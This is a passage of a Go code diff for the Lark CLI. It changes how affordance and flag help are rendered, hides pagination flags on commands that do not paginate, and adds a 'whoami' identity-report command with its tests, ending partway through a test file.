bullets("Avoid when", a.AvoidWhen)
bullets("Prerequisites", a.Prerequisites)
bullets("Tips", a.Tips)
if len(a.Examples) > 0 {
var lines []string
for _, ex := range a.Examples {
@@ -71,10 +244,13 @@ func renderAffordance(m meta.Method) string {
}
}
if len(lines) > 0 {
fmt.Fprintf(&b, "Examples:\n%s\n", strings.Join(lines, "\n"))
sections = append(sections, "Examples:\n"+strings.Join(lines, "\n"))
}
}
for _, ext := range a.Extensions {
bullets(ext.Label, ext.Items)
}
bullets("Related", a.Related)
return strings.TrimRight(b.String(), "\n")
return strings.Join(sections, "\n\n")
}

View File

@@ -8,15 +8,18 @@ import (
"strings"
"testing"
"github.com/larksuite/cli/internal/cmdmeta"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/meta"
"github.com/spf13/cobra"
)
func TestRenderAffordance(t *testing.T) {
raw := json.RawMessage(`{
"use_when": ["发送文本消息"],
"do_not_use_when": ["群已解散"],
"avoid_when": ["群已解散"],
"prerequisites": ["已获取 chat_id"],
"tips": ["富文本用 msg_type=post"],
"examples": [
{"description":"发一条文本","command":"lark-cli im messages create --params '{...}'"},
{"command":"lark-cli im messages list"},
@@ -29,6 +32,7 @@ func TestRenderAffordance(t *testing.T) {
"When to use:", "发送文本消息",
"Avoid when:", "群已解散",
"Prerequisites:", "已获取 chat_id",
"Tips:", "富文本用 msg_type=post",
"Examples:", "发一条文本", "lark-cli im messages create --params '{...}'",
"lark-cli im messages list", // example with no description -> bare command line
"Related:", "im.messages.list",
@@ -48,9 +52,12 @@ func TestRenderAffordance(t *testing.T) {
}
}
func TestServiceMethod_AffordanceInLong(t *testing.T) {
// Affordance is rendered lazily (at --help time) rather than baked into the
// command's Long, so building a command never carries the affordance block —
// even for a method whose metadata happens to declare one.
func TestServiceMethod_AffordanceNotInLong(t *testing.T) {
withAff := map[string]interface{}{
"path": "messages", "httpMethod": "POST", "description": "发送消息",
"id": "messages.create", "path": "messages", "httpMethod": "POST", "description": "发送消息",
"affordance": map[string]interface{}{
"examples": []interface{}{
map[string]interface{}{"description": "发文本", "command": "lark-cli im messages create ..."},
@@ -59,14 +66,120 @@ func TestServiceMethod_AffordanceInLong(t *testing.T) {
}
f, _, _, _ := cmdutil.TestFactory(t, testConfig)
cmd := NewCmdServiceMethod(f, imSpec(), meta.FromMap(withAff), "create", "messages", nil)
if !strings.Contains(cmd.Long, "Examples:") || !strings.Contains(cmd.Long, "lark-cli im messages create ...") {
t.Errorf("affordance examples not in command Long:\n%s", cmd.Long)
if strings.Contains(cmd.Long, "Examples:") {
t.Errorf("affordance must not be baked into Long (lazy):\n%s", cmd.Long)
}
// A method with no affordance adds no guidance block.
plain := map[string]interface{}{"path": "x", "httpMethod": "GET", "description": "d"}
cmd2 := NewCmdServiceMethod(f, imSpec(), meta.FromMap(plain), "list", "x", nil)
if strings.Contains(cmd2.Long, "Examples:") {
t.Errorf("no-affordance method should have no Examples in Long:\n%s", cmd2.Long)
// The lookup ref is recorded so the help path can resolve it later.
if cmd.Annotations[affordanceServiceAnnotation] != "im" || cmd.Annotations[affordanceMethodAnnotation] != "messages.create" {
t.Errorf("affordance ref annotations = %v, want im/messages.create", cmd.Annotations)
}
}
// RenderAffordanceForCmd resolves a command's overlay through the (injectable)
// lookup and renders it; commands without a ref render nothing.
func TestRenderAffordanceForCmd(t *testing.T) {
orig := affordanceLookup
t.Cleanup(func() { affordanceLookup = orig })
affordanceLookup = func(service, methodID string) (json.RawMessage, bool) {
if service != "im" || methodID != "messages.create" {
return nil, false
}
return json.RawMessage(`{"use_when":["发文本消息"],"tips":["富文本用 msg_type=post"],"examples":[{"description":"发一条","command":"lark-cli im messages create ..."}]}`), true
}
f, _, _, _ := cmdutil.TestFactory(t, testConfig)
withRef := map[string]interface{}{"id": "messages.create", "path": "messages", "httpMethod": "POST", "description": "发送消息"}
cmd := NewCmdServiceMethod(f, imSpec(), meta.FromMap(withRef), "create", "messages", nil)
block := RenderAffordanceForCmd(cmd)
for _, want := range []string{"When to use:", "发文本消息", "Tips:", "富文本用 msg_type=post", "Examples:", "lark-cli im messages create ..."} {
if !strings.Contains(block, want) {
t.Errorf("RenderAffordanceForCmd missing %q in:\n%s", want, block)
}
}
// No overlay for this method id -> empty block.
noRef := map[string]interface{}{"id": "x.list", "path": "x", "httpMethod": "GET", "description": "d"}
cmd2 := NewCmdServiceMethod(f, imSpec(), meta.FromMap(noRef), "list", "x", nil)
if got := RenderAffordanceForCmd(cmd2); got != "" {
t.Errorf("method with no overlay should render nothing, got:\n%s", got)
}
}
// PrepareMethodHelp composes the guidance into Long at the top: description,
// then the affordance block, then the full-schema pointer — so an agent reads
// when-to-use/examples before the flag list.
func TestPrepareMethodHelp(t *testing.T) {
orig := affordanceLookup
t.Cleanup(func() { affordanceLookup = orig })
affordanceLookup = func(_, _ string) (json.RawMessage, bool) {
return json.RawMessage(`{"use_when":["发文本消息"],"examples":[{"description":"发一条","command":"lark-cli im messages create ..."}]}`), true
}
f, _, _, _ := cmdutil.TestFactory(t, testConfig)
m := map[string]interface{}{"id": "messages.create", "path": "messages", "httpMethod": "POST", "description": "发送消息"}
cmd := NewCmdServiceMethod(f, imSpec(), meta.FromMap(m), "create", "messages", nil)
if !PrepareMethodHelp(cmd) {
t.Fatal("PrepareMethodHelp returned false for a service-method command")
}
long := cmd.Long
// Description leads; affordance block sits above the schema pointer.
descAt := strings.Index(long, "发送消息")
useAt := strings.Index(long, "When to use:")
exAt := strings.Index(long, "Examples:")
schemaAt := strings.Index(long, "Full parameter schema:")
if descAt != 0 {
t.Errorf("description should lead Long, got:\n%s", long)
}
if !(descAt < useAt && useAt < exAt && exAt < schemaAt) {
t.Errorf("order should be description < affordance < schema pointer; got desc=%d use=%d ex=%d schema=%d\n%s", descAt, useAt, exAt, schemaAt, long)
}
// A non-service command (no schema-path annotation) is left untouched.
if PrepareMethodHelp(&cobra.Command{Use: "plain"}) {
t.Error("PrepareMethodHelp should return false for a non-service command")
}
}
// domainCmd wires a domain-tagged command with a subcommand under a root, the
// shape PrepareDomainHelp expects.
func domainCmd(short, long string) *cobra.Command {
root := &cobra.Command{Use: "root"}
dom := &cobra.Command{Use: "event", Short: short, Long: long}
cmdmeta.SetDomain(dom, "event")
dom.AddCommand(&cobra.Command{Use: "consume", Run: func(*cobra.Command, []string) {}})
root.AddCommand(dom)
return dom
}
func TestPrepareDomainHelp_PreservesHandAuthoredLong(t *testing.T) {
const long = "Unified event consumption system. Use 'event consume <EventKey>'."
dom := domainCmd("Consume and manage real-time events", long)
if !PrepareDomainHelp(dom, nil) {
t.Fatal("PrepareDomainHelp returned false for a domain-tagged command")
}
if !strings.HasPrefix(dom.Long, long) {
t.Errorf("hand-authored Long must lead; got:\n%s", dom.Long)
}
if !strings.Contains(dom.Long, "Risk levels") {
t.Errorf("domain guidance should be appended; got:\n%s", dom.Long)
}
// Re-rendering must not append the guidance a second time.
PrepareDomainHelp(dom, nil)
if n := strings.Count(dom.Long, "Risk levels"); n != 1 {
t.Errorf("guidance appended %d times across re-renders, want 1:\n%s", n, dom.Long)
}
}
// A service domain carries only a Short at help time; it seeds the base.
func TestPrepareDomainHelp_FallsBackToShort(t *testing.T) {
dom := domainCmd("Message and group chat management", "")
if !PrepareDomainHelp(dom, nil) {
t.Fatal("PrepareDomainHelp returned false for a domain-tagged command")
}
if !strings.HasPrefix(dom.Long, "Message and group chat management") {
t.Errorf("Short should seed Long when no hand-authored Long exists; got:\n%s", dom.Long)
}
}

View File

@@ -60,8 +60,11 @@ func TestServiceFlagGroups_AgentContract(t *testing.T) {
if i := idx("--chat-id"); i < iParams || i > iBody {
t.Errorf("--chat-id not under API Parameters:\n%s", out)
}
if !strings.Contains(out, "chat_id, required") {
t.Errorf("typed flag help format wrong:\n%s", out)
// The redundant "<name>, required|optional." prefix is gone: required-ness is
// carried by the Required:/Optional: subheadings, and the snake-case --params
// key by the schema envelope — so it isn't echoed on every flag line.
if strings.Contains(out, "chat_id, required") || strings.Contains(out, "member_id_type, optional") {
t.Errorf("redundant <name>, required/optional prefix should not appear:\n%s", out)
}
if !strings.Contains(out, "enum: open_id=以 open_id 标识用户|user_id=以 user_id 标识用户") {
t.Errorf("expected compact enum value=meaning inline:\n%s", out)

View File

@@ -30,6 +30,11 @@ func fieldFacts(f meta.Field) []string {
if d := sanitizeFieldDesc(f.Description); d != "" {
facts = append(facts, d)
}
if f.CanonicalType() == "boolean" {
// cobra shows no type word for bools and swallows a separate value as a
// positional, so spell out the presence-only contract.
facts = append(facts, "bool flag (presence = true; omit for false; takes no value)")
}
if opts := f.EnumOptions(); len(opts) > 0 {
facts = append(facts, "enum: "+formatEnumInline(opts))
}
@@ -42,20 +47,15 @@ func fieldFacts(f meta.Field) []string {
return facts
}
// paramFlagUsage renders the typed param flag's help line:
//
// <param_name>, required|optional[. <fact>]...
//
// It leads with the canonical underscore param name (the key this flag
// overrides in --params) and required/optional, then joins the field's facts
// inline.
// paramFlagUsage renders the typed param flag's help line: the field's facts
// joined inline. Required/optional is not repeated here — the grouped help's
// Required:/Optional: subheadings already partition the flags — and the
// snake-case --params key is carried by the schema envelope (each param's
// property + "flag") and the params-only addendum, so it isn't echoed on every
// line either. Returns "" when the field has no facts (cobra then shows the bare
// flag with its type).
func paramFlagUsage(f meta.Field) string {
req := "optional"
if f.Required {
req = "required"
}
parts := append([]string{fmt.Sprintf("%s, %s", f.Name, req)}, fieldFacts(f)...)
return strings.Join(parts, ". ") + "."
return strings.Join(fieldFacts(f), ". ")
}
// paramExample picks a concrete sample for a params-only field's --help snippet:
@@ -103,8 +103,23 @@ func sanitizeOptionDesc(s string) string { return inlineClause(s, "。;;\n\r",
// sanitizeFieldDesc is the field-description policy: one line per field, so
// keep full sentences and cut only at note separators (meta_data appends
// bullet notes after ;/) — the later sentence often carries the key
// affordance, e.g. user_mailbox_id's `可以输入"me"`.
func sanitizeFieldDesc(s string) string { return inlineClause(s, ";\n\r", 60) }
// affordance, e.g. user_mailbox_id's `可以输入"me"`. The trailing doc
// cross-reference is dropped first (see cutDocRef).
func sanitizeFieldDesc(s string) string { return inlineClause(cutDocRef(s), ";\n\r", 60) }
// docRefRe matches a "see the docs" breadcrumb (更多信息参见…/获取方式见…/详见…).
// On the compact flag line the markdown link's URL is stripped, so the
// breadcrumb is a dead pointer — drop it. Anchored on a leading clause separator
// so a subject that runs straight into the phrase isn't orphaned.
var docRefRe = regexp.MustCompile(`[。;;,、]\s*(更多信息|获取方式|获取方法|详见|[请可]?参[见考阅])`)
// cutDocRef truncates s at the first doc-reference breadcrumb.
func cutDocRef(s string) string {
if loc := docRefRe.FindStringIndex(s); loc != nil {
return s[:loc[0]]
}
return s
}
// formatEnumInline renders allowed values for the help line: "v=meaning" when
// the value carries a (sanitized, truncated) description — so opaque numeric

View File

@@ -7,6 +7,7 @@ import (
"context"
"fmt"
"io"
"sort"
"strings"
"github.com/larksuite/cli/errs"
@@ -64,15 +65,38 @@ func registerServiceWithContext(ctx context.Context, parent *cobra.Command, svc
// resource-command chain — one level for a flat dotted resource like
// "chat.members", deeper for genuinely nested resources. A service with no
// methods keeps its bare command (svcCmd is created above regardless).
for _, ref := range apicatalog.ServiceMethods(svc, nil) {
refs := apicatalog.ServiceMethods(svc, nil)
// Collect each resource's verbs up front so resourceShort can summarize a
// resource as its verb list from the first ensureChildCommand call.
verbs := map[string][]string{}
for _, ref := range refs {
key := strings.Join(ref.ResourcePath, ".")
verbs[key] = append(verbs[key], ref.Method.Name)
}
for _, ref := range refs {
resCmd := svcCmd
var path []string
for _, seg := range ref.ResourcePath {
resCmd = ensureChildCommand(resCmd, seg, seg+" operations")
path = append(path, seg)
resCmd = ensureChildCommand(resCmd, seg, resourceShort(seg, verbs[strings.Join(path, ".")]))
}
resCmd.AddCommand(buildMethodCommand(ctx, f, newMethodCommandSpec(ref), nil, parent.PersistentFlags()))
}
}
// resourceShort summarizes a resource as its sorted verb list, or the
// "<name> operations" placeholder for an intermediate group with no methods.
func resourceShort(seg string, verbs []string) string {
if len(verbs) == 0 {
return seg + " operations"
}
sorted := append([]string(nil), verbs...)
sort.Strings(sorted)
return strings.Join(sorted, ", ")
}
// serviceShort is the service command's help summary: the localized description
// from the registry, falling back to the metadata's own description.
func serviceShort(svc meta.Service) string {
@@ -177,7 +201,19 @@ type methodCommandSpec struct {
// the API declares a body.
acceptsBody bool
declaresBody bool
affordance string // rendered hand-authored usage guidance (when-to-use, examples); "" if none
paginates bool // method accepts a page_token param (so --page-all is meaningful)
serviceName string // owning service name (e.g. "approval"), for the lazy affordance lookup
}
// methodPaginates reports whether a method takes a page_token param, the signal
// that makes the --page-all/--page-limit/--page-delay flags meaningful.
func methodPaginates(m meta.Method) bool {
for _, f := range m.Params() {
if f.Name == "page_token" {
return true
}
}
return false
}
func newMethodCommandSpec(ref apicatalog.MethodRef) methodCommandSpec {
@@ -186,6 +222,7 @@ func newMethodCommandSpec(ref apicatalog.MethodRef) methodCommandSpec {
method: m,
schemaPath: ref.SchemaPath(),
servicePath: ref.Service.ServicePath,
serviceName: ref.Service.Name,
risk: m.Risk,
restricts: m.RestrictsIdentity(),
identities: m.Identities(),
@@ -193,7 +230,7 @@ func newMethodCommandSpec(ref apicatalog.MethodRef) methodCommandSpec {
fileFields: detectFileFields(m),
acceptsBody: methodTakesBody(m.HTTPMethod),
declaresBody: len(m.Data()) > 0 || len(m.Files()) > 0,
affordance: renderAffordance(m),
paginates: methodPaginates(m),
}
}
@@ -254,6 +291,14 @@ func buildMethodCommand(ctx context.Context, f *cmdutil.Factory, spec methodComm
cmd.Flags().BoolVar(&opts.PageAll, "page-all", false, "automatically paginate through all pages")
cmd.Flags().IntVar(&opts.PageLimit, "page-limit", 10, "max pages to fetch with --page-all (0 = unlimited)")
cmd.Flags().IntVar(&opts.PageDelay, "page-delay", 200, "delay in ms between pages")
// Keep the pagination flags registered (a harmless no-op if passed) but hide
// them from help on non-paginating commands, so help doesn't imply a
// get/write can paginate.
if !spec.paginates {
for _, name := range []string{"page-all", "page-limit", "page-delay"} {
_ = cmd.Flags().MarkHidden(name)
}
}
cmd.Flags().StringVar(&opts.Format, "format", "json", "output format: json|ndjson|table|csv")
cmd.Flags().Bool("json", false, "shorthand for --format json")
cmd.Flags().StringVarP(&opts.JqExpr, "jq", "q", "", "jq expression to filter JSON output")
@@ -271,10 +316,11 @@ func buildMethodCommand(ctx context.Context, f *cmdutil.Factory, spec methodComm
// Registered last so the collision guard sees the standard flags above.
opts.binder = newParamFlagBinder(cmd, spec.params, reserved)
// Single composition point for Long: description, affordance, schema
// pointer, and the binder's params-only addendum (params whose flag name is
// taken, reachable via --params only).
cmd.Long = methodLong(m.Description, spec.affordance, spec.schemaPath, opts.binder.paramsOnlyHelp())
// Build-time Long; the agent guidance is added lazily by PrepareMethodHelp
// (setMethodHelpData records the coordinates it needs).
paramsOnly := opts.binder.paramsOnlyHelp()
cmd.Long = methodLong(m.Description, spec.schemaPath, paramsOnly)
setMethodHelpData(cmd, spec.serviceName, m.ID, spec.schemaPath, paramsOnly)
// Group flags for the grouped --help renderer (typed param flags are grouped
// as API Parameters by the binder). tagFlagGroup is a no-op for flags not
@@ -292,13 +338,11 @@ func buildMethodCommand(ctx context.Context, f *cmdutil.Factory, spec methodComm
tagFlagGroup(cmd.Flags(), "file", groupBody)
if fl := cmd.Flags().Lookup("params"); fl != nil {
annotate(fl, flagGroupAnnotation, []string{groupRaw})
// State the precedence rule where the agent reads it: --params is the
// base, typed flags override. Only meaningful when typed flags exist.
// Keep the precedence rule on the flag's own one line (not a multi-line
// note that breaks the one-entry-per-flag rhythm an agent parses). Only
// meaningful when typed flags exist to override.
if len(spec.params) > 0 {
annotate(fl, flagNoteAnnotation, []string{
"Typed API parameter flags above are preferred.",
"If both are set, typed flags override matching keys in --params.",
})
fl.Usage = "Raw URL/query params JSON. Supports - and @file. If both set, typed flags override matching keys in --params."
}
}
for _, name := range []string{"as", "dry-run", "page-all", "page-limit", "page-delay", "yes"} {

163
cmd/whoami/whoami.go Normal file
View File

@@ -0,0 +1,163 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package whoami
import (
"context"
"github.com/spf13/cobra"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/identitydiag"
"github.com/larksuite/cli/internal/output"
)
// whoamiResult is the structured output of `lark-cli whoami`.
//
// The self-vs-delegated distinction is carried by `identity`: a bot identity is
// the app acting as itself; a user identity is the app acting *on behalf of* a
// person (calls are attributed to that user, who is not necessarily present).
// onBehalfOf only *names* that person and so appears only once a user is
// resolved — a user identity that is not signed in still has identity "user"
// but no onBehalfOf yet. Do not read "no onBehalfOf" as "self"; read `identity`.
type whoamiResult struct {
Profile string `json:"profile"`
AppID string `json:"appId"`
Brand core.LarkBrand `json:"brand"`
DefaultAs string `json:"defaultAs"`
Identity string `json:"identity"`
IdentitySource string `json:"identitySource"`
Available bool `json:"available"`
TokenStatus string `json:"tokenStatus"`
OnBehalfOf *delegatedUser `json:"onBehalfOf,omitempty"`
Hint string `json:"hint,omitempty"`
}
// delegatedUser is the user a user-identity acts on behalf of.
type delegatedUser struct {
UserName string `json:"userName,omitempty"`
OpenID string `json:"openId,omitempty"`
}
// Options holds inputs for the whoami command.
type Options struct {
Factory *cmdutil.Factory
As string
}
// NewCmdWhoami creates the top-level whoami command. It reports the identity
// that the next API call would actually use (resolved via Factory.ResolveAs),
// together with the active profile, app, and token status. Output is always
// JSON — whoami is consumed by agents. With the built-in credential path it is
// local-only; when an external credential provider manages tokens, resolving
// the identity may contact that provider.
func NewCmdWhoami(f *cmdutil.Factory) *cobra.Command {
opts := &Options{Factory: f}
cmd := &cobra.Command{
Use: "whoami",
Short: "Show the current effective identity, app, profile, and token status (JSON)",
RunE: func(cmd *cobra.Command, args []string) error {
return whoamiRun(cmd, opts)
},
}
cmdutil.DisableAuthCheck(cmd)
cmdutil.AddAPIIdentityFlag(context.Background(), cmd, f, &opts.As)
// Output is always JSON. Accept (and ignore) --json so existing
// `whoami --json` callers don't break; hide it to avoid implying a non-JSON
// mode exists.
cmd.Flags().Bool("json", true, "deprecated: output is always JSON")
_ = cmd.Flags().MarkHidden("json")
cmdutil.SetRisk(cmd, "read")
return cmd
}
func whoamiRun(cmd *cobra.Command, opts *Options) error {
f := opts.Factory
cfg, err := f.Config()
if err != nil {
return err
}
ctx := cmd.Context()
flagAs := core.Identity(opts.As)
as := f.ResolveAs(ctx, cmd, flagAs)
// Validate as a real API call does (strict mode, then identity) so whoami
// can't preview an identity the next call would refuse.
if err := f.CheckStrictMode(ctx, as); err != nil {
return err
}
if err := f.CheckIdentity(as, []string{"user", "bot"}); err != nil {
return err
}
source := resolveSource(
cmd.Flags().Changed("as"),
flagAs,
f.IdentityAutoDetected,
f.ResolveStrictMode(ctx).ForcedIdentity(),
)
diag := identitydiag.Diagnose(ctx, f, cfg, false)
res := buildResult(cfg, as, source, diag)
output.PrintJson(f.IOStreams.Out, res)
return nil
}
// resolveSource derives how the effective identity became effective.
// Mirrors Factory.ResolveAs precedence: explicit flag wins; otherwise an
// auto-detected result means auto-detect; otherwise a strict-mode forced
// identity means strict-mode; otherwise it came from configured default-as.
// Values are snake_case to match the other enum fields (e.g. tokenStatus).
func resolveSource(changedAs bool, flagAs core.Identity, autoDetected bool, strictForced core.Identity) string {
if changedAs && (flagAs == core.AsUser || flagAs == core.AsBot) {
return "flag"
}
if autoDetected {
return "auto_detect"
}
if strictForced != "" {
return "strict_mode"
}
return "default_as"
}
// buildResult maps the resolved identity and local diagnostics into the output.
// ResolveAs only ever returns user or bot, so the default branch handles user.
func buildResult(cfg *core.CliConfig, as core.Identity, source string, diag identitydiag.Result) *whoamiResult {
defaultAs := cfg.DefaultAs
if defaultAs == "" {
defaultAs = core.AsAuto
}
res := &whoamiResult{
Profile: cfg.ProfileName,
AppID: cfg.AppID,
Brand: cfg.Brand,
DefaultAs: string(defaultAs),
Identity: string(as),
IdentitySource: source,
}
// Use the diagnosed hint as-is: it is tailored to the credential source, so
// it never says "auth login" when that is blocked under an external provider.
switch as {
case core.AsBot:
res.Available = diag.Bot.Available
res.TokenStatus = diag.Bot.Status
if !diag.Bot.Available {
res.Hint = diag.Bot.Hint
}
default: // user
res.Available = diag.User.Available
// Use Status (not the raw TokenStatus) so the vocab matches the bot
// branch: "ready" means usable for both. available stays the canonical
// usable signal; tokenStatus is the readable state behind it.
res.TokenStatus = diag.User.Status
// Set onBehalfOf only when a user is actually resolved; an unresolved
// user identity (not signed in) has no one to act on behalf of yet.
if diag.User.UserName != "" || diag.User.OpenID != "" {
res.OnBehalfOf = &delegatedUser{UserName: diag.User.UserName, OpenID: diag.User.OpenID}
}
if !diag.User.Available {
res.Hint = diag.User.Hint
}
}
return res
}

320
cmd/whoami/whoami_test.go Normal file
View File

@@ -0,0 +1,320 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package whoami
import (
"bytes"
"context"
"encoding/json"
"errors"
"fmt"
"net/http"
"strings"
"testing"
"github.com/larksuite/cli/errs"
extcred "github.com/larksuite/cli/extension/credential"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/credential"
"github.com/larksuite/cli/internal/identitydiag"
)
func TestResolveSource(t *testing.T) {
tests := []struct {
name string
changedAs bool
flagAs core.Identity
autoDetected bool
strictForced core.Identity
want string
}{
{"explicit flag user", true, core.AsUser, false, "", "flag"},
{"explicit flag bot", true, core.AsBot, false, "", "flag"},
{"flag auto falls through to auto-detect", true, core.AsAuto, true, "", "auto_detect"},
{"auto detected", false, "", true, "", "auto_detect"},
{"strict mode", false, "", false, core.AsBot, "strict_mode"},
{"default_as", false, "", false, "", "default_as"},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := resolveSource(tt.changedAs, tt.flagAs, tt.autoDetected, tt.strictForced)
if got != tt.want {
t.Errorf("resolveSource() = %q, want %q", got, tt.want)
}
})
}
}
func TestBuildResult_UserValid(t *testing.T) {
cfg := &core.CliConfig{ProfileName: "my-app", AppID: "cli_x", Brand: core.BrandLark, DefaultAs: core.AsAuto}
diag := identitydiag.Result{
User: identitydiag.Identity{Available: true, Status: "ready", TokenStatus: "valid", OpenID: "ou_x", UserName: "Alice"},
}
r := buildResult(cfg, core.AsUser, "auto_detect", diag)
if r.Identity != "user" || r.IdentitySource != "auto_detect" {
t.Fatalf("identity/source = %q/%q", r.Identity, r.IdentitySource)
}
// tokenStatus mirrors the unified Status vocab ("ready"), not the raw "valid".
if !r.Available || r.TokenStatus != "ready" {
t.Fatalf("available=%v status=%q", r.Available, r.TokenStatus)
}
if r.OnBehalfOf == nil || r.OnBehalfOf.OpenID != "ou_x" || r.OnBehalfOf.UserName != "Alice" {
t.Fatalf("onBehalfOf = %#v, want Alice/ou_x", r.OnBehalfOf)
}
if r.Hint != "" {
t.Fatalf("hint = %q, want empty", r.Hint)
}
if r.Profile != "my-app" || r.AppID != "cli_x" || r.Brand != core.BrandLark {
t.Fatalf("app context = %#v", r)
}
}
func TestBuildResult_UserMissingToken(t *testing.T) {
cfg := &core.CliConfig{ProfileName: "p", AppID: "cli_x", Brand: core.BrandLark}
diag := identitydiag.Result{
User: identitydiag.Identity{Available: false, Status: "missing", Hint: "run: lark-cli auth login --help"}, // never logged in
}
r := buildResult(cfg, core.AsUser, "auto_detect", diag)
if r.Available {
t.Fatalf("available = true, want false")
}
if r.TokenStatus != "missing" {
t.Fatalf("tokenStatus = %q, want missing", r.TokenStatus)
}
// whoami renders the diagnosed hint verbatim (single source of truth) so it
// stays correct for the external-provider path without whoami knowing about it.
if r.Hint != diag.User.Hint {
t.Fatalf("hint = %q, want propagated %q", r.Hint, diag.User.Hint)
}
if r.DefaultAs != "auto" {
t.Fatalf("defaultAs = %q, want auto (empty normalized)", r.DefaultAs)
}
}
func TestBuildResult_BotReady(t *testing.T) {
cfg := &core.CliConfig{ProfileName: "p", AppID: "cli_x", Brand: core.BrandFeishu, DefaultAs: core.AsBot}
diag := identitydiag.Result{
Bot: identitydiag.Identity{Available: true, Status: "ready"},
}
r := buildResult(cfg, core.AsBot, "default_as", diag)
if r.Identity != "bot" || r.IdentitySource != "default_as" {
t.Fatalf("identity/source = %q/%q", r.Identity, r.IdentitySource)
}
if !r.Available || r.TokenStatus != "ready" {
t.Fatalf("available=%v status=%q", r.Available, r.TokenStatus)
}
if r.OnBehalfOf != nil {
t.Fatalf("bot must not carry onBehalfOf: %#v", r.OnBehalfOf)
}
if r.Hint != "" {
t.Fatalf("hint = %q, want empty", r.Hint)
}
}
func TestBuildResult_BotNotConfigured(t *testing.T) {
cfg := &core.CliConfig{ProfileName: "p", AppID: "cli_x", Brand: core.BrandFeishu}
diag := identitydiag.Result{
Bot: identitydiag.Identity{Available: false, Status: "not_configured", Hint: "run: lark-cli config --help"},
}
r := buildResult(cfg, core.AsBot, "auto_detect", diag)
if r.Available {
t.Fatalf("available = true, want false")
}
if r.TokenStatus != "not_configured" {
t.Fatalf("tokenStatus = %q, want not_configured", r.TokenStatus)
}
if r.Hint != diag.Bot.Hint {
t.Fatalf("hint = %q, want propagated %q", r.Hint, diag.Bot.Hint)
}
}
func TestWhoami_BotJSON(t *testing.T) {
f, stdout, _, _ := cmdutil.TestFactory(t, &core.CliConfig{
ProfileName: "test-profile", AppID: "test-app", AppSecret: "test-secret", Brand: core.BrandFeishu,
})
cmd := NewCmdWhoami(f)
cmd.SetArgs([]string{}) // bare whoami: output is always JSON, no flag needed
if err := cmd.Execute(); err != nil {
t.Fatalf("Execute() error = %v", err)
}
var got whoamiResult
if err := json.Unmarshal(stdout.Bytes(), &got); err != nil {
t.Fatalf("json.Unmarshal() error = %v\n%s", err, stdout.String())
}
if got.Identity != "bot" {
t.Fatalf("identity = %q, want bot", got.Identity)
}
if !got.Available || got.TokenStatus != "ready" {
t.Fatalf("available=%v status=%q, want true/ready", got.Available, got.TokenStatus)
}
if got.Profile != "test-profile" {
t.Fatalf("profile = %q, want test-profile", got.Profile)
}
if got.IdentitySource == "" {
t.Fatalf("identitySource empty")
}
if got.OnBehalfOf != nil {
t.Fatalf("bot (self) must not carry onBehalfOf: %#v", got.OnBehalfOf)
}
}
func TestWhoami_RejectsInvalidAs(t *testing.T) {
for _, bad := range []string{"admin", "USER", "bogus123", ""} {
t.Run("as="+bad, func(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{
ProfileName: "p", AppID: "test-app", AppSecret: "test-secret", Brand: core.BrandFeishu,
})
cmd := NewCmdWhoami(f)
cmd.SetArgs([]string{"--as", bad})
err := cmd.Execute()
if err == nil {
t.Fatalf("Execute() with --as %q = nil, want validation error", bad)
}
// Lock in the typed validation contract: an unsupported identity must
// surface as a *errs.ValidationError on --as, not just any error.
var ve *errs.ValidationError
if !errors.As(err, &ve) {
t.Fatalf("Execute() with --as %q: error type = %T, want *errs.ValidationError: %v", bad, err, err)
}
if ve.Subtype != errs.SubtypeInvalidArgument {
t.Errorf("Subtype = %q, want %q", ve.Subtype, errs.SubtypeInvalidArgument)
}
if ve.Param != "--as" {
t.Errorf("Param = %q, want %q", ve.Param, "--as")
}
})
}
}
func TestWhoami_ConfigErrorPropagates(t *testing.T) {
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{
ProfileName: "p", AppID: "test-app", AppSecret: "test-secret", Brand: core.BrandFeishu,
})
wantErr := fmt.Errorf("boom")
f.Config = func() (*core.CliConfig, error) { return nil, wantErr }
cmd := NewCmdWhoami(f)
cmd.SetArgs([]string{"--json"})
err := cmd.Execute()
if err == nil {
t.Fatalf("Execute() error = nil, want propagated config error")
}
// The f.Config() failure must propagate unchanged, not be masked by a later
// command-execution error.
if !errors.Is(err, wantErr) {
t.Fatalf("Execute() error = %v, want it to wrap %v", err, wantErr)
}
}
func TestWhoami_StrictModeRejectsCrossIdentity(t *testing.T) {
// Bot-only account → strict mode bot. A real `--as user` call would be
// rejected by CheckStrictMode; whoami must reject it identically rather than
// previewing a user identity the next call would refuse.
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{
ProfileName: "p", AppID: "test-app", AppSecret: "test-secret", Brand: core.BrandFeishu,
SupportedIdentities: 2, // bot only
})
cmd := NewCmdWhoami(f)
cmd.SetArgs([]string{"--as", "user", "--json"})
err := cmd.Execute()
if err == nil {
t.Fatalf("Execute() with --as user under strict bot = nil, want strict-mode rejection")
}
var ve *errs.ValidationError
if !errors.As(err, &ve) {
t.Fatalf("error type = %T, want *errs.ValidationError: %v", err, err)
}
}
type fakeExtProvider struct {
name string
account *extcred.Account
}
func (p *fakeExtProvider) Name() string { return p.name }
func (p *fakeExtProvider) ResolveAccount(context.Context) (*extcred.Account, error) {
return p.account, nil
}
func (p *fakeExtProvider) ResolveToken(context.Context, extcred.TokenSpec) (*extcred.Token, error) {
return nil, nil // no UAT served locally; whoami runs with verify=false
}
func externalWhoamiFactory(cfg *core.CliConfig) (*cmdutil.Factory, *bytes.Buffer) {
cred := credential.NewCredentialProvider(
[]extcred.Provider{&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: cfg.AppID}}},
nil, nil,
func() (*http.Client, error) { return nil, nil },
)
out := &bytes.Buffer{}
f := &cmdutil.Factory{
Config: func() (*core.CliConfig, error) { return cfg, nil },
Credential: cred,
IOStreams: &cmdutil.IOStreams{Out: out, ErrOut: &bytes.Buffer{}},
}
return f, out
}
// Regression for the external-provider blind spot: with credentials managed by
// an extension provider, a signed-in user must read as available, and an
